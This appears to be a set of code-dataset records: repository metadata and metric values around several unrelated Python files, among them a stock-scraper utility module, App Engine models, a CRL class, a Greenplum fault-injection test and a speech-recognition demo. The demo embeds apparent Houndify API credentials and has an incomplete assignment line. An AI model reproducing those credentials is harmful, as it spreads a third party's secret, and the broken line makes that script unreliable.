0
0.486509
0
0
0
0
0
0
1
0
false
0
0.02381
0
0.02381
0.452381
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
2
daaf40a6e0a5cb830dd91fcd7e3b46efbcad6d4e
13,714
py
Python
common.py
hwase0ng/klseScrappers
367ac86b603fad35c4983b04f9e72d4694d4bc31
[ "MIT" ]
3
2020-05-27T06:01:12.000Z
2021-11-29T20:56:06.000Z
common.py
hwase0ng/klseScrappers
367ac86b603fad35c4983b04f9e72d4694d4bc31
[ "MIT" ]
3
2020-03-08T14:45:16.000Z
2021-12-13T19:47:14.000Z
common.py
hwase0ng/klseScrappers
367ac86b603fad35c4983b04f9e72d4694d4bc31
[ "MIT" ]
null
null
null
""" Created on Apr 27, 2018 @author: hwase0ng """ from BeautifulSoup import BeautifulSoup from utils.dateutils import getToday, getDayOffset, generate_dates from utils.fileutils import wc_line_count from curses.ascii import isprint import csv import json import requests import sys import settings as S import socket import os from utils.fileutils import cd class FifoList: def __init__(self): self.data = [] def append(self, data): self.data.append(data) def pop(self): return self.data.pop(0) class FifoDict: def __init__(self): self.data = {} self.nextin = 0 self.nextout = 0 def append(self, data): self.nextin += 1 self.data[self.nextin] = data def pop(self): self.nextout += 1 result = self.data[self.nextout] del self.data[self.nextout] if S.DBG_ALL: print 'out:', self.nextout, result return result def loadSetting(c): chromedir = c["main"]["CHROME_DIR"] if len(chromedir) > 0: S.CHROME_DIR = chromedir S.BKUP_DIR = c["main"]["BKUP_DIR"] S.MT4_DIR = c["main"]["MT4_DIR"] try: # Allows DATA_DIR to be overwritten here datadir = c["main"]["DATA_DIR"] if len(datadir) > 0 and (datadir.endswith('/') or datadir.endswith('\\')): S.DATA_DIR = datadir S.DATA_DIR_W = c["main"]["DATA_DIR_W"] except Exception: pass S.I3_UID = c["i3"]["UID"] S.I3_PWD = c["i3"]["PWD"] S.I3_KLSE_URL = c["i3"]["KLSE_URL"] S.I3_HOLDINGS = c["i3"]["HOLDINGS"] S.I3_WATCHLIST = c["i3"]["WATCHLIST"] S.I3_MVP = c["i3"]["MVP"] S.I3_MOMENTUM = c["i3"]["MOMENTUM"] S.I3_DIVIDEND = c["i3"]["DIVIDEND"] S.I3_PORTFOLIO_URL = S.I3_KLSE_URL + c["i3"]["PORTFOLIO_URL"] def loadCfg(datadir): try: # Refers backup drive instead of DATA_DIR which is in network share with open(datadir + 'config.json') as json_data_file: cfg = json.load(json_data_file) loadSetting(cfg) return cfg except EnvironmentError: print "Missing config.json file:", datadir sys.exit(1) def loadRelatedMap(): idmap = {} others = S.KLSE_RELATED.split(',') for item in others: other = item.split('.') idmap[other[0]] = other[1] return idmap def loadMap(klsemap, sep=","): ID_MAPPING = loadRelatedMap() try: with open(klsemap) as idmap: for line in idmap: name, var = line.partition(sep)[::2] if sep in var: # input: "3A,0012,THREE-A RESOURCES BHD,507" # drops ",THREE-A RESOURCES BHD,507" var, dummy = var.partition(sep)[::2] ID_MAPPING[name.strip()] = var.strip() if S.DBG_ALL: print dict(ID_MAPPING.items()[0:3]) except EnvironmentError: print "Invalid map file:", klsemap except KeyError: print "loadIdMap KeyError:", name return ID_MAPPING def loadKlseRelated(): stocklist = {} counters = S.KLSE_RELATED.split(',') for counter in counters: counter = counter.split('.') stocklist[counter[0]] = counter[1] return stocklist def loadKlseCounters(infile): stocklist = {} with open(infile) as f: reader = csv.reader(f) slist = list(reader) if S.DBG_ALL: print slist[:3] for counter in slist[:]: if S.DBG_ALL: print "\t", counter[0] stocklist[counter[0]] = counter[1] return stocklist def formStocklist(stocks, infile): stocklist = {} if "," in stocks: stocks = stocks.split(",") else: stocks = [stocks] imap = loadMap(infile, ',') for shortname in stocks: # stock_code = getStockCode(shortname, infile) try: if "." in shortname: # KLSE related from settings.py names = shortname.split('.') stocklist[names[0]] = names[1] else: stock_code = imap[shortname] stocklist[shortname] = stock_code except KeyError: print "Applied hack for missing entry:", shortname # Hack to bypass restriction on KLSE counters stocklist[shortname] = "0" return stocklist def appendCsv(rtn_code, OUTPUT_FILE): if rtn_code != 0: return TMP_FILE = OUTPUT_FILE + 'tmp' f = open(OUTPUT_FILE, "ab+") ftmp = open(TMP_FILE, "rb") f.write(ftmp.read()) f.flush() f.close() ftmp.close() def getDataDir(datadir, dirname="klseScrapers"): if datadir.startswith('/') or datadir.startswith('\\'): # Using absolute path; e.g. /d/klse/data return datadir # Using relative path such as ./data cwd = os.getcwd().split(os.sep) ind = cwd.index(dirname) cwdlen = len(cwd) if ind == cwdlen - 1: return os.path.join(".", datadir) elif ind == cwdlen - 2: return os.path.join("..", datadir) return os.path.join("..", "..", datadir) def getI3Dir(): cwd = os.getcwd().split(os.sep) cwdlen = len(cwd) if cwd[cwdlen - 1] == 'klseScrapers': return 'scrapers/i3investor/' elif cwd[cwdlen - 1] == 'i3investor': return './' return '' def isOpen(ip, port): s = socket.socket(socket. AF_INET, socket.SOCK_STREAM) s.settimeout(5) try: s.connect((ip, port)) s.shutdown(2) return True except Exception: return False def getMt4StartDate(): mt4Start = getDayOffset(getToday('%Y-%m-%d'), S.MT4_DAYS * -1) # Fixed to 1st Jan of year mt4Start = mt4Start[:4] + "-01-01" return mt4Start def retrieveCounters(clist): if clist is None or not len(clist): return '' valids = "dhkmwM" if not any((c in clist) for c in valids): print clist, "is not one of", valids print "defaulting to m for MVP" clist = "m" counters = [] if 'd' in clist: counters += S.I3_DIVIDEND.split(',') if 'h' in clist: counters += S.I3_HOLDINGS.split(',') if 'k' in clist: counters += S.KLSE_RELATED.split(',') if 'm' in clist: counters += S.I3_MVP.split(',') if 'w' in clist: counters += S.I3_WATCHLIST.split(',') if 'M' in clist: counters += S.I3_MOMENTUM.split(',') return ",".join(counters) # obsolete, use retrieveCounters instead def getCounters(counterlist, klse, pf, wl, verbose=True): counters = '' if klse: slist = loadKlseRelated() clist = list(slist.keys()) counters = ','.join(clist) if pf: if len(counters) > 0: counters += ',' + S.I3_HOLDINGS else: counters = S.I3_HOLDINGS if wl and len(S.I3_WATCHLIST) > 0: if len(counters) > 0: counters += ',' + S.I3_WATCHLIST else: counters = S.I3_WATCHLIST if len(counterlist) > 0: if len(counters) > 0: counters += ',' + ','.join(counterlist) else: counters = ','.join(counterlist) if len(counters) > 0: return counters.upper() if verbose: print " INF:Counter is empty" return counters def getSkipRows(csvfl, skipdays=S.MVP_DAYS): row_count = wc_line_count(csvfl) if row_count < 0: return -1, -1 # File not found if row_count < skipdays: skiprow = 0 else: skiprow = row_count - skipdays return skiprow, row_count def match_approximate(a, b, approx): c, d = [], [] bEnd = False bfifo = FifoDict() for i in b: bfifo.append(i) y = 0 for x in a: if bEnd: continue while True: if y == 0 or x - y > approx: try: y = bfifo.pop() except KeyError: bEnd = True break if abs(x - y) <= approx: c.append(x) d.append(y) break if y > x: break return [c, d] # Credit to the following implementation goes to Matt Messersmith: # https://stackoverflow.com/questions/53022670/how-to-compare-2-sorted-numeric-lists-in-python-where-each-corresponding-element def match_approximate2(a, b, approx, invert=False, vector=None, cmpv=None): a_ind, b_ind = 0, 0 resulta, resultb = [], [] while a_ind < len(a) and b_ind < len(b): aItem, bItem = a[a_ind], b[b_ind] if abs(aItem - bItem) <= approx: if not invert: resulta.append(aItem) resultb.append(bItem) else: yrange = max(vector) - min(vector) ydist = abs(vector[aItem] - vector[bItem]) if ydist > yrange / 10: resulta.append(aItem) resultb.append(bItem) else: if S.DBG_ALL: print "Invert filters:", cmpv, aItem, bItem, \ vector[aItem], vector[bItem], yrange, ydist a_ind += 1 b_ind += 1 continue if aItem < bItem: if invert: resulta.append(aItem) a_ind += 1 else: if invert: resultb.append(bItem) b_ind += 1 ''' def match_last_element(a, a_ind, last_elt_of_b, resulta, resultb): while a_ind != len(a): if abs(a[a_ind] - last_elt_of_b) <= approx: resulta.append(a[a_ind]) resultb.append(b[b_ind]) a_ind += 1 else: break if a_ind != len(a): match_last_element(a, a_ind, b[-1], resulta, resultb) else: match_last_element(b, b_ind, a[-1], resulta, resultb) ''' if invert: while a_ind != len(a): resulta.append(a[a_ind]) a_ind += 1 while b_ind != len(b): resulta.append(b[b_ind]) b_ind += 1 return [resulta, resultb] def combineList(listoflists): xpositive, xnegative, ypositive, ynegative = \ listoflists[0], listoflists[1], listoflists[2], listoflists[3] # 0=XP, 1=XN, 2=YP, 3=YN datelist, ylist = sorted(xpositive + xnegative), [] for dt in datelist: try: pos = xpositive.index(dt) ylist.append(ypositive[pos]) except ValueError: pos = xnegative.index(dt) ylist.append(ynegative[pos]) return ylist def matchdates(l1, l2, approx=31): swapP, matchdict = False, {} if l1[-1] < l2[-1]: swapP = True if not swapP: list1, list2 = l1, l2 else: # TASCO 2012-06-08 list1, list2 = l2, l1 for i, val in enumerate(list1): matchtolerance = 0 try: j = list2.index(val) except ValueError: j = -1 if approx: dtstart = getDayOffset(val, approx * -1) dtend = getDayOffset(val, approx) for newval in list2: if newval < dtstart: continue if newval > dtend: break matchtolerance = 1 j = list2.index(newval) break matchval = 0 if j < 0 else j - len(list2) matchdict[i - len(list1)] = [matchval, matchtolerance, val] return swapP, matchdict def printable(pstr): return ''.join(char for char in pstr if isprint(char)) def connect_url(url): global soup try: page = requests.get(url, headers=S.HEADERS) assert(page.status_code == 200) html = page.content soup = BeautifulSoup(html) except Exception as e: print(e) soup = '' return soup if __name__ == '__main__': ''' line = "3A,0012,THREE-A RESOURCES BHD,507" name, var = line.partition(',')[::2] if ',' in var: var, dummy = var.partition(',')[::2] print name print var print getDataDir('data/') with cd('scrapers'): print getDataDir('data/') with cd('scrapers/i3'): print getDataDir('data/') ''' ''' lists = [['2018-03-31', '2018-04-05'], ['2018-01-05', '2018-04-01'], [1.2, 1.5], [1.1, 2.0]] print combineList(lists) lists = [['2018-03-01', '2018-03-05', '2018-04-30'], ['2018-01-05', '2018-04-01'], [1.2, 1.5, 1.7], [1.1, 2.0]] print combineList(lists) lists = [['2018-03-31', '2018-04-05'], ['2018-04-01'], [1.2, 1.5], [2.0]] print combineList(lists) ''' mdatesp = ['2013-03-31', '2013-10-31', '2013-12-31', '2014-03-03'] pdatesp = ['2013-01-31', '2013-03-31', '2013-06-30', '2013-09-30', '2013-12-31'] mdatesn = ['2013-07-31', '2013-11-30', '2014-02-28'] pdatesn = ['2013-02-28', '2013-04-30', '2013-07-31', '2013-11-30', '2014-02-28'] print matchdates(mdatesn, pdatesn) m = matchdates(mdatesp, pdatesp) print m for k, v in enumerate(sorted(m, reverse=True)): print k, v, m[v]
29.240938
130
0.521948
1,652
13,714
4.250605
0.224576
0.008545
0.014099
0.013671
0.176445
0.11464
0.08687
0.048704
0.022928
0.016092
0
0.049882
0.350955
13,714
468
131
29.303419
0.739018
0.050095
0
0.22792
1
0
0.055925
0
0.002849
0
0
0
0.002849
0
null
null
0.002849
0.034188
null
null
0.054131
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
dabb68b6fb48686276a922ea58be91f96ae78543
4,076
py
Python
src/solutions/common/models/group_purchase.py
goubertbrent/oca-backend
b9f59cc02568aecb55d4b54aec05245790ea25fd
[ "Apache-2.0" ]
null
null
null
src/solutions/common/models/group_purchase.py
goubertbrent/oca-backend
b9f59cc02568aecb55d4b54aec05245790ea25fd
[ "Apache-2.0" ]
null
null
null
src/solutions/common/models/group_purchase.py
goubertbrent/oca-backend
b9f59cc02568aecb55d4b54aec05245790ea25fd
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright 2020 Green Valley Belgium NV # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # @@license_version:1.7@@ from rogerthat.dal import parent_key, parent_key_unsafe from rogerthat.rpc import users from rogerthat.utils.service import get_identity_from_service_identity_user, \ get_service_user_from_service_identity_user from google.appengine.ext import db from solutions.common.models.properties import SolutionUserProperty from solutions.common.utils import create_service_identity_user_wo_default class SolutionGroupPurchaseSettings(db.Model): visible = db.BooleanProperty(indexed=False, default=True) branding_hash = db.StringProperty(indexed=False) @property def service_user(self): return users.User(self.parent_key().name()) @staticmethod def create_key(service_user, solution): return db.Key.from_path(SolutionGroupPurchaseSettings.kind(), service_user.email(), parent=parent_key(service_user, solution)) class SolutionGroupPurchase(db.Model): title = db.StringProperty(indexed=False) description = db.TextProperty(indexed=False) picture = db.BlobProperty(indexed=False) picture_version = db.IntegerProperty(indexed=False, default=0) units = db.IntegerProperty(indexed=False) unit_description = db.TextProperty(indexed=False) unit_price = db.IntegerProperty(indexed=False) # in euro cents min_units_pp = db.IntegerProperty(indexed=False) max_units_pp = db.IntegerProperty(indexed=False) time_from = db.IntegerProperty() # epoch time_until = db.IntegerProperty() # epoch deleted = db.BooleanProperty(default=False) @property def unit_price_in_euro(self): return u'{:20,.2f}'.format(self.unit_price / 100.0).strip() @property def id(self): return self.key().id() @property def service_identity_user(self): return users.User(self.parent_key().name()) @property def service_user(self): return get_service_user_from_service_identity_user(self.service_identity_user) @property def service_identity(self): return get_identity_from_service_identity_user(self.service_identity_user) @property def subscriptions(self): return SolutionGroupPurchaseSubscription.all().ancestor(self) def subscriptions_for_user(self, app_user): return SolutionGroupPurchaseSubscription.all().ancestor(self).filter('app_user =', app_user) @property def units_available(self): available_units = self.units for e in self.subscriptions: available_units -= e.units return available_units @staticmethod def list(service_user, service_identity, solution): service_identity_user = create_service_identity_user_wo_default(service_user, service_identity) return SolutionGroupPurchase.all().ancestor(parent_key_unsafe(service_identity_user, solution)).filter('deleted', False) class SolutionGroupPurchaseSubscription(db.Model): sender = SolutionUserProperty(indexed=False) # app name = db.StringProperty(indexed=False) # cms units = db.IntegerProperty(indexed=False) timestamp = db.IntegerProperty(indexed=False) app_user = db.UserProperty(indexed=True) @property def id(self): return self.key().id() @property def solution_group_purchase_key(self): return self.parent_key() @property def solution_group_purchase(self): return SolutionGroupPurchase.get(self.solution_group_purchase_key)
36.392857
128
0.73945
501
4,076
5.824351
0.313373
0.061686
0.071624
0.069568
0.297807
0.193968
0.113434
0.095956
0.095956
0.06854
0
0.005631
0.172228
4,076
111
129
36.720721
0.859218
0.157017
0
0.306667
0
0
0.007616
0
0
0
0
0
0
1
0.186667
false
0
0.08
0.16
0.746667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
2
dabfd08ab527b85660d4d9570e35a8695162beeb
131
py
Python
bench/test_get.py
eabrouwer3/aiotoolz
10790c9c5a8413502d8f35ce157966290492dbab
[ "BSD-3-Clause" ]
null
null
null
bench/test_get.py
eabrouwer3/aiotoolz
10790c9c5a8413502d8f35ce157966290492dbab
[ "BSD-3-Clause" ]
null
null
null
bench/test_get.py
eabrouwer3/aiotoolz
10790c9c5a8413502d8f35ce157966290492dbab
[ "BSD-3-Clause" ]
null
null
null
from aiotoolz import get tuples = [(1, 2, 3) for i in range(100000)] def test_get(): for tup in tuples: get(1, tup)
14.555556
43
0.603053
23
131
3.391304
0.695652
0
0
0
0
0
0
0
0
0
0
0.105263
0.274809
131
8
44
16.375
0.715789
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.4
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
dac361a95a6b2abc8f3940126e5652a22be4255b
788
py
Python
xrpl/utils/str_conversions.py
antonyggvzvmnxxcx/xrpl-py
fda7ce2a28807374b40324478e42e17d97a063d7
[ "ISC" ]
null
null
null
xrpl/utils/str_conversions.py
antonyggvzvmnxxcx/xrpl-py
fda7ce2a28807374b40324478e42e17d97a063d7
[ "ISC" ]
2
2022-02-23T22:57:46.000Z
2022-02-24T11:41:49.000Z
xrpl/utils/str_conversions.py
antonyggvzvmnxxcx/xrpl-py
fda7ce2a28807374b40324478e42e17d97a063d7
[ "ISC" ]
1
2022-02-21T07:36:36.000Z
2022-02-21T07:36:36.000Z
"""Various useful string conversions utilities for XRPL.""" def str_to_hex(input: str) -> str: """ Convert a UTF-8-encoded string into hexadecimal encoding. XRPL uses hex strings as inputs in fields like `domain` in the `AccountSet` transaction. Args: input: UTF-8-encoded string to convert Returns: Input encoded as a hex string. """ return input.encode("utf-8").hex() def hex_to_str(input: str) -> str: """ Convert a hex string into a human-readable string. XRPL uses hex strings as inputs in fields like `domain` in the `AccountSet` transaction. Args: input: hex-encoded string to convert Returns: Input encoded as a human-readable string. """ return bytes.fromhex(input).decode()
24.625
61
0.656091
108
788
4.75
0.37037
0.023392
0.042885
0.070175
0.553606
0.479532
0.479532
0.479532
0.479532
0.307992
0
0.005085
0.251269
788
31
62
25.419355
0.864407
0.68401
0
0
0
0
0.030303
0
0
0
0
0
0
1
0.5
false
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
dacec6192e4e79e1e83802fb0e5ede942684c020
335
py
Python
sshr/clients/admin.py
zhengxiaowai/sshm
af83e9c8dfc805747d978b8e9031bf57f057bebd
[ "MIT" ]
null
null
null
sshr/clients/admin.py
zhengxiaowai/sshm
af83e9c8dfc805747d978b8e9031bf57f057bebd
[ "MIT" ]
null
null
null
sshr/clients/admin.py
zhengxiaowai/sshm
af83e9c8dfc805747d978b8e9031bf57f057bebd
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- from core import SSHRAdmin from ._dropbox import DropboxClient from ._qiniu import QiniuClient from ._webdav import WebdavClient sshr_admin = SSHRAdmin() sshr_admin.register('dropbox', DropboxClient) sshr_admin.register('qiniu', QiniuClient) sshr_admin.register('webdav', WebdavClient)
23.928571
45
0.78209
41
335
6.219512
0.487805
0.141176
0.2
0
0
0
0
0
0
0
0
0.003333
0.104478
335
13
46
25.769231
0.846667
0.125373
0
0
0
0
0.061856
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
dad1393dffc0b140629b9522d25813d0ecd5bc80
78
py
Python
pc.py
MaNongJiaLe/DaYuHaiTang
3063de6e390dfb2d74ae3ae6a30e10f6dc31d16f
[ "Apache-2.0" ]
null
null
null
pc.py
MaNongJiaLe/DaYuHaiTang
3063de6e390dfb2d74ae3ae6a30e10f6dc31d16f
[ "Apache-2.0" ]
null
null
null
pc.py
MaNongJiaLe/DaYuHaiTang
3063de6e390dfb2d74ae3ae6a30e10f6dc31d16f
[ "Apache-2.0" ]
null
null
null
print('nice' in 'nice to meet you') a=1000000 b=1000000 c=a+b print(c)
6
35
0.628205
16
78
3.0625
0.625
0
0
0
0
0
0
0
0
0
0
0.229508
0.217949
78
12
36
6.5
0.57377
0
0
0
0
0
0.27027
0
0
0
0
0
0
1
0
false
0
0
0
0
0.4
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
dadcb98c933ba30f86807ce7fd3fbfa6b2ab04f4
2,255
py
Python
tools/libs/PassID-Server/src/pymrtd/pki/crl.py
lukapercic/PassID-Public-Docs
4ae305af837231c4bf7ba94154c5bc29d2873fe9
[ "MIT" ]
1
2022-01-06T11:28:03.000Z
2022-01-06T11:28:03.000Z
tools/libs/PassID-Server/src/pymrtd/pki/crl.py
lukapercic/PassID-Public-Docs
4ae305af837231c4bf7ba94154c5bc29d2873fe9
[ "MIT" ]
1
2021-01-08T17:32:08.000Z
2021-01-08T17:32:08.000Z
tools/libs/PassID-Server/src/pymrtd/pki/crl.py
lukapercic/PassID-Public-Docs
4ae305af837231c4bf7ba94154c5bc29d2873fe9
[ "MIT" ]
2
2020-12-18T22:47:09.000Z
2020-12-18T22:48:57.000Z
''' File name: crl.py Author: ZeroPass - Nejc Skerjanc License: MIT lincense Python Version: 3.6 ''' from .x509 import CscaCertificate from .cert_utils import verify_sig from asn1crypto.crl import CertificateList import datetime """ CRL: \ -object *** -serial Number*** -subject key //not -authority key (CSCA - foreign key) *** -countrKey *** -start, end valid *** -signature algorithm string** -signature hash algorithm string** -SHA256 hash over whole object string or bytes """ class CertificateRevocationListError(Exception): pass class CertificateRevocationList(CertificateList): """Class; object that stores Certificate Revocation List (CRL) and has supporting functions """ @property def issuerCountry(self) -> str: """Function returns country of CRL issuer""" country = self.issuer.native['country_name'] return country @property def size(self) -> int: """Function returns size of CRL""" size = len(self['tbs_cert_list']['revoked_certificates']) return size @property def thisUpdate(self) -> datetime: """Returns the date when this CRL was issued""" this_update = self['tbs_cert_list']['this_update'].native return this_update @property def nextUpdate(self) -> datetime: """Returns the date of next CRL issuance""" next_update = self['tbs_cert_list']['next_update'].native return next_update @property def signatureAlgorithm(self) -> str: """It returns signature algorithm""" sig_algo = self['signature_algorithm'].signature_algo return sig_algo @property def signatureHashAlgorithm(self) -> str: """It returns hash of signature algorithm""" hash_algo = self['signature_algorithm'].hash_algo return hash_algo @property def fingerprint(self) -> str: """SHA256 hash over this CRL object""" fp = self.sha256.hex() return fp def verify(self, issuer: CscaCertificate): """ Function verifies if crl is signed by provided issuer CSCA """ verify_sig(issuer, self['tbs_cert_list'].dump(), self['signature'], self['signature_algorithm'])
28.544304
104
0.654102
255
2,255
5.67451
0.411765
0.053214
0.030408
0.041465
0.064962
0
0
0
0
0
0
0.008731
0.238137
2,255
78
105
28.910256
0.833527
0.218625
0
0.189189
0
0
0.122507
0
0
0
0
0
0
1
0.216216
false
0.027027
0.108108
0
0.567568
0.027027
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
daeb71ef71ffac61a566af31cde51e40b5ffba23
2,173
py
Python
pythonPrograms/microphone_recognition.py
akierson/capstone-prototype
a7d5754653f8c64d17ba21fbe4801c316a95b318
[ "MIT" ]
null
null
null
pythonPrograms/microphone_recognition.py
akierson/capstone-prototype
a7d5754653f8c64d17ba21fbe4801c316a95b318
[ "MIT" ]
null
null
null
pythonPrograms/microphone_recognition.py
akierson/capstone-prototype
a7d5754653f8c64d17ba21fbe4801c316a95b318
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # NOTE: this example requires PyAudio because it uses the Microphone class import speech_recognition as sr # obtain audio from the microphone r = sr.Recognizer() with sr.Microphone() as source: print("Say something!") audio = r.listen(source) # recognize speech using Sphinx try: print("Sphinx thinks you said " + r.recognize_sphinx(audio)) except sr.UnknownValueError: print("Sphinx could not understand audio") except sr.RequestError as e: print("Sphinx error; {0}".format(e)) # recognize speech using Google Speech Recognition try: # for testing purposes, we're just using the default API key # to use another API key, use `r.recognize_google(audio, key="GOOGLE_SPEECH_RECOGNITION_API_KEY")` # instead of `r.recognize_google(audio)` print("Google Speech Recognition thinks you said " + r.recognize_google(audio)) except sr.UnknownValueError: print("Google Speech Recognition could not understand audio") except sr.RequestError as e: print("Could not request results from Google Speech Recognition service; {0}".format(e)) # recognize speech using Google Cloud Speech GOOGLE_CLOUD_SPEECH_CREDENTIALS = try: print("Google Cloud Speech thinks you said " + r.recognize_google_cloud(audio, credentials_json=GOOGLE_CLOUD_SPEECH_CREDENTIALS)) except sr.UnknownValueError: print("Google Cloud Speech could not understand audio") except sr.RequestError as e: print("Could not request results from Google Cloud Speech service; {0}".format(e)) # recognize speech using Houndify # Has free level for 12 things/day HOUNDIFY_CLIENT_ID = "KVXJVsAp-z_JAZlxwKHq_g==" # Houndify client IDs are Base64-encoded strings HOUNDIFY_CLIENT_KEY = "zUmSQKKcHAn_VEd8LsPnpUluwK5Db9YMblgDicyPm5yD7tp20WswAHDTKb1LsAHHL2laMDmzgyDVBkQNX-AKEg==" # Houndify client keys are Base64-encoded strings try: print("Houndify thinks you said " + r.recognize_houndify(audio, client_id=HOUNDIFY_CLIENT_ID, client_key=HOUNDIFY_CLIENT_KEY)) except sr.UnknownValueError: print("Houndify could not understand audio") except sr.RequestError as e: print("Could not request results from Houndify service; {0}".format(e))
42.607843
163
0.774045
295
2,173
5.59322
0.308475
0.038788
0.047273
0.033939
0.375758
0.28
0.244848
0.178182
0.178182
0.178182
0
0.01073
0.1422
2,173
50
164
43.46
0.874464
0.277957
0
0.375
0
0
0.397815
0.071979
0
0
0
0
0
0
null
null
0
0.03125
null
null
0.40625
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
2
daf9942d2334651ad722f813433f661721b44f8b
2,300
py
Python
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/access_methods/ao_memory.py
lintzc/GPDB
b48c8b97da18f495c10065d0853db87960aebae2
[ "PostgreSQL", "Apache-2.0" ]
1
2017-09-15T06:09:56.000Z
2017-09-15T06:09:56.000Z
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/access_methods/ao_memory.py
guofengrichard/gpdb
29bdd6ef38d8d9b9cb04ca31d44e279eb9f640d3
[ "PostgreSQL", "Apache-2.0" ]
null
null
null
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/access_methods/ao_memory.py
guofengrichard/gpdb
29bdd6ef38d8d9b9cb04ca31d44e279eb9f640d3
[ "PostgreSQL", "Apache-2.0" ]
1
2018-12-04T09:13:57.000Z
2018-12-04T09:13:57.000Z
#!/usr/bin/env python """ Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved. This program and the accompanying materials are made available under the terms of the under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from gppylib.commands.base import Command from tinctest import logger from mpp.lib.PSQL import PSQL from mpp.models import MPPTestCase import os import re import socket import time import shutil import sys import signal class aoreadmemory(MPPTestCase): def tearDown(self): gpfaultinjector = Command('fault injector', 'source $GPHOME/greenplum_path.sh; ' 'gpfaultinjector -f malloc_failure ' '-y reset -H ALL -r primary') gpfaultinjector.run() def test_ao_malloc_failure(self): """ @product_version gpdb: [4.3.5.1 -] """ PSQL.run_sql_command('DROP table if exists ao_read_malloc') PSQL.run_sql_command('create table ao_read_malloc (a int) with (appendonly=true, compresstype=quicklz)') PSQL.run_sql_command('insert into ao_read_malloc ' 'select * from generate_series(1, 1000)') gpfaultinjector = Command('fault injector', 'source $GPHOME/greenplum_path.sh; ' 'gpfaultinjector -f malloc_failure ' '-y error -H ALL -r primary') gpfaultinjector.run() res ={'rc':0, 'stdout':'', 'stderr':''} PSQL.run_sql_command(sql_cmd='select count(*) from ao_read_malloc', results=res) logger.info(res) self.assertTrue("ERROR: fault triggered" in res['stderr']) self.assertFalse("ERROR: could not temporarily connect to one or more segments" in res['stderr']) logger.info('Pass')
34.848485
112
0.662609
299
2,300
5.010033
0.551839
0.040053
0.026702
0.045394
0.162884
0.162884
0.12283
0.12283
0.12283
0.12283
0
0.012761
0.250435
2,300
65
113
35.384615
0.856148
0.008696
0
0.235294
0
0
0.352295
0.047188
0
0
0
0
0.058824
0
null
null
0.029412
0.323529
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
1
0
0
0
0
2
971097828072775e23da859896c3b27a12ba0f10
866
py
Python
setup.py
emanuil-tolev/fundfind
95cc4b30efc6a3dc73142d82ea32c8fd8ca74029
[ "MIT" ]
null
null
null
setup.py
emanuil-tolev/fundfind
95cc4b30efc6a3dc73142d82ea32c8fd8ca74029
[ "MIT" ]
null
null
null
setup.py
emanuil-tolev/fundfind
95cc4b30efc6a3dc73142d82ea32c8fd8ca74029
[ "MIT" ]
null
null
null
from setuptools import setup, find_packages setup( name = 'fundfind', version = '0.1', packages = find_packages(), url = 'http://fundfind.cottagelabs.com', author = 'Emanuil Tolev', author_email = 'emanuil.tolev@gmail.com', description = 'fundfind - an Open way to share, visualise and map out scholarly funding opportunities', license = 'MIT', # TODO look for other potentially useful classifiers classifiers = [ 'Development Status :: 3 - Alpha', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', ], install_requires = [ 'werkzeug==0.8.3', 'Flask==0.9', 'Flask-Login==0.1.3', 'Flask-WTF==0.8.2', 'pyes==0.16', 'requests==1.1.0', 'parsedatetime==0.8.7', ], )
28.866667
107
0.58545
99
866
5.080808
0.69697
0.011928
0
0
0
0
0
0
0
0
0
0.036278
0.267898
866
29
108
29.862069
0.757098
0.057737
0
0.076923
0
0
0.496925
0.02829
0
0
0
0.034483
0
1
0
true
0
0.038462
0
0.038462
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
1
0
0
0
0
0
0
2
971279e27cb8fe7a2ddcfa304bd094cf6b9e8fdb
2,423
py
Python
Logger.py
